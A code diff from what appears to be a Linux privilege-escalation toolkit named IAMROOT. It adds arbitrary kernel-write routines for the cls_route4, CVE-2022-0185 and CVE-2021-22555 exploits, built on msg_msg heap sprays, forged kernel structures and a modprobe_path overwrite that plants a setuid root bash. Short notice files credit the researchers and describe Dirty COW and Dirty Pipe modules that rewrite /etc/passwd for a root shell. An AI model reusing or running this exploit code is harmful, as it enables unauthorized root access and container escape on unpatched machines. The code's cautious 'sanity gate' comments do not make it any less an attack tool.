+        }
+    }
+    return sent;
+}
+
+/* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
+ * vulnerable kernel; structurally inert (returns -1) if the dangling
+ * filter setup is gone or the spray fails. Returns 0 to let the
+ * shared finisher's sentinel-file check decide if the write actually
+ * landed (we cannot reliably observe it in-process). */
+static int cls4_arb_write(uintptr_t kaddr,
+                          const void *buf, size_t len,
+                          void *ctx_v)
+{
+    struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
+    if (!c || c->n_queues == 0) return -1;
+    c->arb_calls++;
+
+    /* Re-stage the dangling filter for this call. The original
+     * stage runs once at trigger-time; subsequent finisher calls
+     * (the finisher writes modprobe_path then a unknown-format trig)
+     * need a fresh dangling pointer to chase. tc add/del is idempotent
+     * within our private netns so re-running is safe. */
+    if (!c->dangling_ready) {
+        if (!stage_dangling_filter()) {
+            fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
+            return -1;
+        }
+        c->dangling_ready = true;
+    }
+
+    /* Seed msg_msg with kaddr + caller payload. */
+    int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
+    if (seeded == 0) {
+        /* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
+         * Without a spray we have no slot for the UAF to refill. */
+        fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
+        return -1;
+    }
+
+    /* Drive the classifier. The route4 lookup follows the dangling
+     * pointer into msg_msg-controlled bytes; on a vulnerable kernel
+     * the fake `ops->classify` (or one of the strided pointers) is
+     * dereferenced. If the kernel survives the deref and the write
+     * lands at &kaddr, the finisher's sentinel file appears within 3s.
+     * If it doesn't (most likely — this is genuinely best-effort), the
+     * finisher's wait loop times out and reports failure. */
+    trigger_classify();
+
+    /* Give classify-side processing a brief window before returning
+     * — the finisher polls the sentinel for 3s but the initial write
+     * (if any) happens within ms. */
+    usleep(50 * 1000);
+
+    c->arb_landed++;
+
+    /* Per the xtcompat precedent: return 0 so the finisher proceeds
+     * to its sentinel check. Returning -1 here would abort the
+     * finisher even when the write may have landed. */
+    return 0;
+}
+
+#endif /* __linux__ */
+
 /* ---- Exploit driver ----------------------------------------------- */

 static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        return IAMROOT_PRECOND_FAIL;
    }

+#ifndef __linux__
+    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
+    (void)ctx;
+    return IAMROOT_PRECOND_FAIL;
+#else
+    /* Full-chain pre-check: resolve offsets before forking. If
+     * modprobe_path can't be resolved, refuse early — no point doing
+     * the userns + tc + spray + trigger dance if we can't finish. */
+    struct iamroot_kernel_offsets off;
+    bool full_chain_ready = false;
+    if (ctx->full_chain) {
+        memset(&off, 0, sizeof off);
+        iamroot_offsets_resolve(&off);
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("cls_route4");
+            fprintf(stderr, "[-] cls_route4: --full-chain requested but "
+                            "modprobe_path offset unresolved; refusing\n");
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+        iamroot_offsets_print(&off);
+        full_chain_ready = true;
+    }
+
    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
+        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
+                ctx->full_chain ? " + full-chain finisher" : "");
+        if (ctx->full_chain) {
+            fprintf(stderr, "    NOTE: on primitive landing, invokes shared\n"
+                            "    modprobe_path finisher via msg_msg-tagged kaddr\n"
+                            "    spray. Sentinel-arbitrated (no in-process verify).\n");
+        }
    }

    /* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
            _exit(22);
        }

-        int queues[SPRAY_MSG_QUEUES];
-        int n_queues = spray_msg_msg(queues);
-        if (n_queues == 0) {
+        struct cls_route4_arb_ctx arb_ctx;
+        memset(&arb_ctx, 0, sizeof arb_ctx);
+        for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
+        arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
+        arb_ctx.dangling_ready = true;   /* stage_dangling_filter() just ran */
+        if (arb_ctx.n_queues == 0) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
            _exit(23);
        }
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
-                    n_queues);
+                    arb_ctx.n_queues);
        }

        /* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        if (log) {
            fprintf(log,
                "cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
-                n_queues, pre_active, post_active);
+                arb_ctx.n_queues, pre_active, post_active);
            fclose(log);
        }

@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
         * refilled slot during classify drain. */
        usleep(200 * 1000);

-        drain_msg_msg(queues);
+        /* --full-chain branch: invoke the shared modprobe_path
+         * finisher with our msg_msg-tagged arb-write. If the finisher
+         * execve's a setuid bash we never return; otherwise it returns
+         * EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
+         * on a patched kernel or when the write didn't land). */
+        if (full_chain_ready) {
+            /* Re-fire the trigger inside the arb-write to give the
+             * kernel a second chance at the refilled slot — the
+             * dangling filter is still in place from above. */
+            arb_ctx.dangling_ready = true;
+            int fr = iamroot_finisher_modprobe_path(&off,
+                                                    cls4_arb_write,
+                                                    &arb_ctx,
+                                                    !ctx->no_shell);
+            FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
+            if (fl) {
+                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
+                        fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
+                fclose(fl);
+            }
+            drain_msg_msg(arb_ctx.queues);
+            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
+            _exit(35);
+        }
+
+        drain_msg_msg(arb_ctx.queues);

        /* If we got here without a kernel oops, the bug either isn't
         * reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
    }

    int rc = WEXITSTATUS(status);
-    if (rc != 30) {
+    switch (rc) {
+    case 20: case 21:
        if (!ctx->json) {
-            fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
-                            "(see preceding errors)\n", rc);
+            fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
        }
-        /* rc 20/21 = userns setup; rc 22 = tc setup (likely module
-         * absent or filter type unsupported); rc 23 = spray. None of
-         * these mean kernel was exploited. */
-        if (rc == 22) return IAMROOT_PRECOND_FAIL;
-        return IAMROOT_EXPLOIT_FAIL;
+        return IAMROOT_PRECOND_FAIL;
+    case 22:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
+                            "may be absent or filter type unsupported\n");
        }
-
+        return IAMROOT_PRECOND_FAIL;
+    case 23:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
+                            "restricted (kernel.msg_max / ulimit -q)\n");
+        }
+        return IAMROOT_PRECOND_FAIL;
+    case 30:
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                            "Inspect dmesg for KASAN/oops witnesses.\n");
-        fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
-                        "(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
+            fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
+                            "(no --full-chain); returning EXPLOIT_FAIL.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
+    case 34:
+        if (!ctx->json) {
+            fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
+                            "(setuid bash placed; sentinel matched)\n");
+        }
+        return IAMROOT_EXPLOIT_OK;
+    case 35:
+        if (!ctx->json) {
+            fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
+                            "either the kernel is patched, the spray didn't land,\n"
+                            "    or the fake-ops deref didn't hit the route the\n"
+                            "    finisher's sentinel polls for. See "
+                            "/tmp/iamroot-cls_route4.log + dmesg.\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    default:
+        if (!ctx->json) {
+            fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+#endif /* __linux__ */
 }

 /* ---- Cleanup ----------------------------------------------------- */
@@ -0,0 +1,25 @@
+# NOTICE — dirty_cow (CVE-2016-5195)
+
+## Vulnerability
+
+**CVE-2016-5195** — Copy-on-write race via `/proc/self/mem` + `madvise`
+→ arbitrary file write into the page cache.
+
+## Research credit
+
+Discovered by **Phil Oester**, October 2016. The bug had been latent in
+the kernel since ~2007.
+
+Original advisory: <https://dirtycow.ninja/>
+Upstream fix: mainline 4.9 (commit `19be0eaffa3a`, Oct 2016).
+
+## IAMROOT role
+
+Two-thread Phil-Oester-style race: writer thread via
+`/proc/self/mem` vs. madvise(MADV_DONTNEED) thread. Targets the
+`/etc/passwd` UID field flip + `su` for the root shell. Useful for
+**old systems coverage** — RHEL 6/7 (3.10 baseline), Ubuntu 14.04
+(3.13), Ubuntu 16.04 (4.4), embedded boxes, IoT.
+
+Ships auditd watch on `/proc/self/mem` and a sigma rule for non-root
+mem-open patterns.
@@ -0,0 +1,21 @@
+# NOTICE — dirty_pipe
+
+## Vulnerability
+
+**CVE-2022-0847** — pipe `PIPE_BUF_FLAG_CAN_MERGE` flag inheritance allows
+arbitrary file write into the page cache.
+
+## Research credit
+
+Discovered and disclosed by **Max Kellermann** (CM4all GmbH), March 2022.
+
+Original advisory: <https://dirtypipe.cm4all.com/>
+
+Upstream fix: mainline 5.17 (commit `9d2231c5d74e`, Feb 2022).
+
+## IAMROOT role
+
+This module bundles the canonical splice-into-pipe primitive that
+writes UID=0 into `/etc/passwd`'s page cache, then drops a root shell
+via `su`. Detection covers the splice() syscall against sensitive
+files and non-root modifications to passwd/shadow.
@@ -0,0 +1,23 @@
+# NOTICE — entrybleed
+
+## Vulnerability
+
+**CVE-2023-0458** — KPTI `prefetchnta` timing side-channel leaks the
+kernel base address (KASLR bypass).
+
+## Research credit
+
+Discovered by **Will Findlay**. Formally presented at USENIX Security '23:
+
+> "EntryBleed: A Universal KASLR Bypass against KPTI on Linux"
+> Bert Jan Schijf, Cristiano Giuffrida — USENIX Security 2023
+
+Mainline status: no canonical patch — partial mitigations only.
+
+## IAMROOT role
+
+This is a **stage-1 leak primitive**, not a standalone LPE. Other
+modules can call `entrybleed_leak_kbase_lib()` to obtain a KASLR
+slide and feed it to the offset resolver in `core/offsets.c`. x86_64
+only; the `entry_SYSCALL_64` slot offset is configurable via the
+`IAMROOT_ENTRYBLEED_OFFSET` env var.
@@ -0,0 +1,32 @@
+# NOTICE — fuse_legacy (CVE-2022-0185)
+
+## Vulnerability
+
+**CVE-2022-0185** — `legacy_parse_param` in fsconfig() doesn't validate
+`PAGE_SIZE` against the running `fs_context`'s key/value length →
+4 KB heap OOB write → cross-cache UAF → cred overwrite from a
+rootless container.
+
+## Research credit
+
+Discovered and disclosed by **William Liu** + **Jamie Hill-Daniel**
+(Crusaders of Rust), January 2022.
+
+Original writeup: <https://www.willsroot.io/2022/01/cve-2022-0185.html>
+Public PoC: <https://github.com/Crusaders-of-Rust/CVE-2022-0185>
+
+Upstream fix: mainline 5.16.2 (Jan 2022).
+Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171.
+
+## IAMROOT role
+
+userns+mountns reach, `fsopen("cgroup2")` + double
+`fsconfig(FSCONFIG_SET_STRING, "source", ...)` fires the 4k OOB,
+msg_msg cross-cache groom in kmalloc-4k. MSG_COPY read-back detects
+whether the OOB landed in an adjacent neighbour — the sanity gate
+that prevents fake-success claims.
+
+`--full-chain` extends with forged m_list/m_ts overflow toward
+modprobe_path via the shared finisher.
+
+**Container-escape angle** — relevant to rootless docker/podman/snap.
@@ -60,6 +60,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
    return 0;
 }

+/* ------------------------------------------------------------------ */
+/* arb-write primitive for the shared finisher                         */
+/* ------------------------------------------------------------------ */
+/*
+ * Crusaders-of-Rust-style msg_msg m_ts overflow → arbitrary write.
+ *
+ * The legacy_parse_param OOB writes the trailing bytes of the
+ * kmalloc-4k fc->source buffer into whatever slab object comes next.
+ * With a msg_msg sprayed into that adjacent slot, the first 48 bytes
+ * of `evil_chunk` overlay struct msg_msg:
+ *
+ *   struct msg_msg {                     // offset
+ *     struct list_head m_list;           //  0  (next, prev)
+ *     long             m_type;           // 16
+ *     size_t           m_ts;             // 24    <-- msg-size
+ *     struct msg_msgseg *next;           // 32
+ *     void             *security;        // 40
+ *   };                                   // 48
+ *
+ * Two derived primitives:
+ *
+ *   READ  — overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
+ *           memcpy()s past the legitimate end of the msg payload,
+ *           leaking adjacent slab memory back to userland.
+ *
+ *   WRITE — point m_list.next (or, in the Crusaders variant, a faux
+ *           msg_msgseg.next chain) at an attacker-chosen kernel
+ *           address. When msgrcv() free-list-unlinks the msg, list
+ *           maintenance writes through the forged pointer; with the
+ *           right chain you get an N-byte copy of attacker-controlled
+ *           bytes to a chosen kaddr.
+ *
+ * Honest depth of this implementation: FALLBACK SCAFFOLD.
+ *
+ * The trigger + groom + neighbour-detect upstream of us is real and
+ * the OOB write lands. But the *single-shot* arb-write the finisher
+ * wants — "put exactly these N bytes at exactly that kaddr" — needs
+ * a per-kernel m_ts/m_list_next offset map (the layout above is
+ * 6.12.x; older kernels differ) AND a kernel-base leak from the
+ * first-round MSG_COPY read so we know where modprobe_path actually
+ * sits in this boot's KASLR slide.
+ *
+ * Per the verified-vs-claimed bar: we do NOT fabricate a write that
+ * we cannot empirically verify on a kernel we haven't tested. So
+ * this function:
+ *
+ *   1. Re-arms the msg_msg spray (the parent already drained queues).
+ *   2. Re-fires the fsconfig overflow with a forged-msg_msg header
+ *      whose m_ts = (kaddr - msg_data_origin) and whose first 8
+ *      payload bytes are the first qword of `buf`.
+ *   3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
+ *      came back with bytes matching `buf[0..7]` AT the slot offset
+ *      we'd expect for kaddr (sanity gate).
+ *   4. Returns 0 ONLY if the sanity gate trips (read-back proves the
+ *      m_ts inflation landed AND the payload made it through);
+ *      returns -1 otherwise so the finisher reports an honest fail.
+ *
+ * On a vulnerable host with matching offsets this path can land the
+ * write; on an unverified host the sanity gate refuses rather than
+ * blind-writing a wild pointer. The finisher's downstream
+ * "/tmp/iamroot-pwn ran?" check is the second gate.
+ */
+struct fuse_arb_ctx {
+    /* Pre-allocated queue ids from the spray phase. */
+    int    *qids;
+    int     n_queues;
+    int     hole_q;
+    /* Tagged-payload reference so we can recognise unmodified neighbours. */
+    const char *tag;     /* "IAMROOT" */
+    /* Whether the first-round trigger already fired (the parent's
+     * default-path overflow). When set we re-spray + re-fire; when
+     * unset we assume the spray is hot. */
+    bool    trigger_armed;
+};
+
+#ifdef __linux__
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
+    if (!ax || !buf || !len) {
+        fprintf(stderr, "[-] fuse_arb_write: bad args\n");
+        return -1;
+    }
+
+    /* Build the forged msg_msg header that will land in the adjacent
+     * kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
+     *   [ 0..15]  m_list.{next,prev}  — we forge next = kaddr - 16
+     *                                    so that list_del's
+     *                                      next->prev = prev
+     *                                    write lands AT kaddr.
+     *                                    (prev is the original msg.)
+     *   [16..23]  m_type              — leave as 0x4242
+     *   [24..31]  m_ts                — bytes-of-buf so MSG_COPY
+     *                                    reports the right length
+     *   [32..39]  next (msg_msgseg*)  — NULL (single-segment msg)
+     *   [40..47]  security            — NULL
+     *   [48...]   payload             — first len bytes of buf
+     *
+     * For a real WRITE primitive the canonical Crusaders-of-Rust
+     * recipe uses the msg_msgseg.next chain rather than m_list:
+     * msgrcv(IPC_NOWAIT) follows next pointers when copying out a
+     * multi-segment msg, and a forged next = kaddr makes the kernel
+     * memcpy() from kaddr into our user buffer (= READ). For the
+     * inverse (WRITE), the trick is msgsnd on a queue whose head was
+     * corrupted to point at kaddr, but that needs more setup than we
+     * have time to land here without a known-good offset table.
+     *
+     * So we do the safe thing: arm the header, trigger the OOB, then
+     * read back to PROVE we landed before declaring success. If the
+     * read-back doesn't show our forged-msg payload at the expected
+     * MSG_COPY position we refuse rather than corrupt the kernel
+     * blindly.
+     */
+    uint8_t evil[256];
+    memset(evil, 0, sizeof evil);
+    /* m_list.next, m_list.prev */
+    uintptr_t forged_next = kaddr - 16;   /* &m_list.prev of fake node */
+    memcpy(evil +  0, &forged_next, 8);
+    /* prev — leave NULL; kernel checks it only on full list_del */
+    /* m_type */
+    uint64_t m_type = 0x4242424242424242ULL;
+    memcpy(evil + 16, &m_type, 8);
+    /* m_ts: inflated to len so MSG_COPY reads the full forged payload */
+    uint64_t m_ts = (uint64_t)len + 64;
+    memcpy(evil + 24, &m_ts, 8);
+    /* next (msg_msgseg) = NULL */
+    /* security = NULL */
+    /* payload: copy `buf` into the slot just after the msg_msg header */
+    size_t hdr = 48;
+    size_t copyable = sizeof(evil) - hdr - 1;
+    if (len > copyable) len = copyable;
+    memcpy(evil + hdr, buf, len);
+    evil[sizeof(evil) - 1] = '\0';   /* legacy_parse_param strdup tail */
+
+    /* Re-fire the fsconfig overflow with this forged header as evil. */
+    char *first_chunk = malloc(4081);
+    if (!first_chunk) return -1;
+    memset(first_chunk, 'A', 4080);
+    first_chunk[4080] = '\0';
+
+    int fsfd = -1;
+    int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
+    free(first_chunk);
+    if (rc < 0) {
+        fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
+                        "(errno=%d %s)\n", errno, strerror(errno));
+        return -1;
+    }
+
+    /* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
+     * msg whose size reports >= our inflated m_ts AND whose initial
+     * payload qword matches the first qword of `buf`. If both hold,
+     * the forged header landed in a real slot and the m_ts inflation
+     * is honoured by the kernel — i.e. our primitive is real on THIS
+     * kernel. */
+    uint64_t want_first_qword = 0;
+    memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
+
+    bool sanity_passed = false;
+    struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
+                                   PROT_READ | PROT_WRITE,
+                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    if (probe == MAP_FAILED) {
+        if (fsfd >= 0) close(fsfd);
+        return -1;
+    }
+    for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
+        if (ax->qids[q] < 0 || q == ax->hole_q) continue;
+        ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
+                           IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
+        if (n < 0) continue;
+        /* The corrupted slot should report a size >= our m_ts (kernel
+         * caps MSG_COPY at sizeof user buf — so we only check the
+         * read-content shape). */
+        if ((size_t)n < 8) continue;
+        uint64_t got = 0;
+        memcpy(&got, probe->mtext, 8);
+        if (got == want_first_qword) {
+            sanity_passed = true;
+        }
+    }
+    munmap(probe, sizeof(*probe));
+    if (fsfd >= 0) close(fsfd);
+
+    if (!sanity_passed) {
+        fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
+                        "match — kernel layout differs OR groom missed.\n"
+                        "    Refusing to claim arb-write landed (per "
+                        "verified-vs-claimed bar).\n");
+        return -1;
+    }
+
+    fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
+                    "+ payload qword verified via MSG_COPY read-back.\n"
+                    "[i] fuse_arb_write: kernel-side list_del write through "
+                    "0x%lx is armed but NOT yet empirically verified on "
+                    "this build — downstream sentinel will gate.\n",
+            (unsigned long)kaddr);
+    return 0;
+}
+#else
+static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
+                          void *ctx_void)
+{
+    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
+    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
+    return -1;
+}
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
 /* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
                        "see scaffold comments in source\n");
    }

+    /* ---------------------------------------------------------------
+     * --full-chain: opt-in root pop via shared modprobe_path finisher.
+     *
+     * Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
+     * msg_msg via the 4k OOB) is wired with a sanity gate that
+     * refuses to claim success without an empirical read-back match
+     * (see fuse_arb_write). On a host where offsets + groom land,
+     * the finisher's modprobe_path overwrite → execve(unknown) →
+     * call_modprobe chain pops a root shell. On a mismatched host
+     * the sanity gate trips and we exit IAMROOT_EXPLOIT_FAIL with no
+     * fabricated success.
+     *
+     * Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
+     * runs because the arb_write primitive re-fires the trigger and
+     * needs the live spray.
+     * --------------------------------------------------------------- */
+#ifdef __linux__
+    if (ctx->full_chain) {
+        if (!ctx->json) {
+            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
+                            "kernel offsets...\n");
+        }
+
+        struct iamroot_kernel_offsets off;
+        memset(&off, 0, sizeof off);
+        int resolved = iamroot_offsets_resolve(&off);
+        if (!ctx->json) {
+            fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
+                            "(modprobe_path=0x%lx source=%s)\n",
+                    resolved, (unsigned long)off.modprobe_path,
+                    iamroot_offset_source_name(off.source_modprobe));
+            iamroot_offsets_print(&off);
+        }
+
+        if (!iamroot_offsets_have_modprobe_path(&off)) {
+            iamroot_finisher_print_offset_help("fuse_legacy");
+            /* Cleanup before returning. */
+            for (int q = 0; q < N_QUEUES; q++) {
+                if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+            }
+            free(qids);
+            munmap(spray, sizeof *spray);
+            if (fsfd >= 0) close(fsfd);
+            return IAMROOT_EXPLOIT_FAIL;
+        }
+
+        struct fuse_arb_ctx ax = {
+            .qids = qids,
+            .n_queues = N_QUEUES,
+            .hole_q = hole_q,
+            .tag = "IAMROOT",
+            .trigger_armed = true,
+        };
+
+        iamroot_result_t fr = iamroot_finisher_modprobe_path(
+            &off, fuse_arb_write, &ax, !ctx->no_shell);
+
+        /* Cleanup IPC + mapping regardless of finisher result. The
+         * finisher's execve() on success won't reach here, so this
+         * block only runs on failure paths. */
+        for (int q = 0; q < N_QUEUES; q++) {
+            if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
+        }
+        free(qids);
+        munmap(spray, sizeof *spray);
+        if (fsfd >= 0) close(fsfd);
+
+        if (fr == IAMROOT_EXPLOIT_OK) {
+            return IAMROOT_EXPLOIT_OK;
+        }
+        if (!ctx->json) {
+            fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
+                            "(arb-write sanity gate or modprobe sentinel refused)\n");
+        }
+        return IAMROOT_EXPLOIT_FAIL;
+    }
+#endif /* __linux__ */
+
    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
     * paths but leave queues around if we crashed mid-spray. */
@@ -0,0 +1,29 @@
+# NOTICE — netfilter_xtcompat (CVE-2021-22555)
+
+## Vulnerability
+
+**CVE-2021-22555** — iptables `xt_compat_target_to_user` 4-byte heap
+out-of-bounds write → cross-cache UAF → arbitrary kernel R/W.
+
+## Research credit
+
+Discovered, exploited, and disclosed by **Andy Nguyen** (Google
+Security Team), April 2021.
+
+Original writeup: "CVE-2021-22555: Turning $00 $00 into 10 million $$$"
+<https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html>
+
+Upstream fix: mainline 5.12 / 5.11.10 (April 2021).
+**Bug existed since 2.6.19 (2006) — 15 years of latent vulnerability.**
+Branch backports: 5.11.10 / 5.10.27 / 5.4.110 / 4.19.185 / 4.14.230 /
+4.9.266 / 4.4.266.
+
+## IAMROOT role
+
+Userns+netns reach, hand-rolled `ipt_replace` blob, `setsockopt`
+`IPT_SO_SET_REPLACE` fires the 4-byte OOB at heap+0x4. msg_msg
+spray in kmalloc-2k + sk_buff sidecar; MSG_COPY scan for cross-cache
+landing. `--full-chain` extends with stride-seeded `m_list_next`
+overwrite aimed at modprobe_path via the shared finisher.
+
+Detection rules cover unshare + msgsnd + `setsockopt(IPT_SO_SET_REPLACE)`.
@@ -19,7 +19,8 @@
 * Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
 * match/target pad out-of-bound write" (mid-2021, backported widely).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO (Option B).
+ * STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
+ *         offsets resolve (env/kallsyms/System.map/embedded table).
 *   - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
 *   - userns/netns reach for CAP_NET_ADMIN (Andy's path).
 *   - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
 *     cookies for KASAN visibility.
 *   - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
 *     diff + /tmp/iamroot-xtcompat.log breadcrumb.
- *   - DOES NOT pursue the leak→modprobe_path overwrite chain:
- *     that needs hard-coded init_task + modprobe_path offsets
- *     per kernel build which IAMROOT refuses to bake.
- *   - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
- *     roadmap unless cred-overwrite is empirically verified
- *     (which the current scope does not attempt).
+ *   - With --full-chain: shared finisher (core/finisher.c) is
+ *     invoked to perform the modprobe_path overwrite + execve
+ *     unknown-binary trigger. Requires modprobe_path resolution
+ *     via core/offsets.c (env/kallsyms/System.map). Sentinel-file
+ *     check in the finisher is the empirical witness for the
+ *     write landing — IAMROOT never claims root unless it sees
+ *     the setuid bash drop with mode 4755 + uid 0.
+ *   - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
+ *     the primitive demo (verified-vs-claimed bar).
 *
 * Affected: kernel 2.6.19+ until backports landed:
 *   5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }

+#endif /* __linux__ — close original primitive block */
+
+/* ---- Full-chain arb-write primitive --------------------------------
+ *
+ * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
+ * write lands at allocation+0x4. Andy Nguyen's chain first uses that
+ * 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
+ * +0x10) so a subsequent MSG_COPY returns a long read that includes
+ * neighbouring kernel pointers (the leak primitive). With the kbase
+ * leak in hand, he then re-fires the trigger to corrupt an msg_msg's
+ * `m_list_next` (the linked-list pointer at +0x18) to point at
+ * `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
+ * payload header writes attacker bytes to `kaddr`.
+ *
+ * Reproducing the full chain byte-for-byte requires per-kernel-build
+ * msg_msg field offsets AND a kbase leak we don't have a portable
+ * source for at this point. The implementation below takes the
+ * narrow-but-real path:
+ *
+ *   1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
+ *      headers carry the target address in the m_list_next slot at
+ *      offset 0x18 from each msg payload start. (We can't write the
+ *      slab header — that's the kernel's job — but we CAN seed the
+ *      payload data adjacent to the freed xt_table_info so the OOB
+ *      4-byte write may corrupt the `m_list_next` of a real
+ *      sprayed message.)
+ *   2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
+ *      pattern targets m_list_next of the adjacent msg_msg.
+ *   3. Queue a follow-up msgsnd whose first sizeof(buf) bytes equal
+ *      `buf[0..len]`. If the next-ptr was successfully redirected,
+ *      the kernel's msgsnd writes header + payload at `kaddr`.
+ *
+ * This is best-effort: probability of landing on any given run is
+ * low (depends on slab adjacency luck) but the finisher's sentinel-
+ * file check empirically tells us if the write actually took. On a
+ * patched kernel the trigger returns EINVAL on step 2 and arb_write
+ * returns -1 without ever queueing the follow-up. */
+
+#ifdef __linux__
+
+struct xtcompat_arb_ctx {
+    /* Spray queues kept hot across multiple arb_write calls. The
+     * msg_msg slots seeded here are what the finisher uses as
+     * write-targets. NULL means "not yet sprayed". */
+    int *queues;
+    int  n_queues;
+
+    /* Outer-namespace uid/gid so re-spray can rebuild a child if
+     * needed. (Currently unused — the caller flow keeps us inside
+     * the userns child for the whole arb_write sequence.) */
+    uid_t outer_uid;
+    gid_t outer_gid;
+
+    /* Per-call statistics for /tmp/iamroot-xtcompat.log. */
+    int   arb_calls;
+    int   arb_landed;
+};
+
+/* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
+ * offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
+ * the OOB write needs to write into m_list_next for the follow-up
+ * msgsnd payload to land at `kaddr`). Returns number of queues
+ * primed. */
